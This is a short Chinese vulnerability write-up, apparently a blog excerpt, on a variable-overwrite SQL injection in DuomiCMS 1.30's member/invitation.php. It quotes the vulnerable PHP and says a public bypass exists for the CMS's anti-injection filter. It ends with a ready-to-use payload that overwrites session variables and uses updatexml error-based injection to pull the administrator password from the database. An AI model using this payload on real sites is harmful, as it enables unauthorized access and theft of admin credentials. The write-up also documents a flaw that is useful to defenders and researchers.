0%

变量覆盖导致注入

  1. 漏洞页面:\member\invitation.php

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    if($dm=='yq')
    {
    $ccgid=$_SESSION['duomi_user_group'];
    $ccuid=$_SESSION['duomi_user_id'];
    $cc1=$dsql->GetOne("select * from duomi_member_group where gid=$ccgid");
    $ccgroup=$cc1['gname'];
    $cc2=$dsql->GetOne("select * from duomi_member where id=$ccuid");
    $ccjifen=$cc2['points'];
    $ccemail=$cc2['email'];
    $cclog=$cc2['logincount'];

    $ccgid,$ccuid均无任何过滤直接带入查询,由于变量覆盖导致此处两个变量均可控制

    该cms采用80sec通用防注入,网上公开方法即可绕过。

    利用:来到member页面,随便注册一个用户,test,登入。

    1
    2
    3
    payload:
    http://127.0.0.1/duomicms_1.30/member/invitation.php
    _SESSION[duomi_user_id]=@`'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'`&_SESSION[duomi_user_group]=1

    注出管理员密码

    阅读全文 »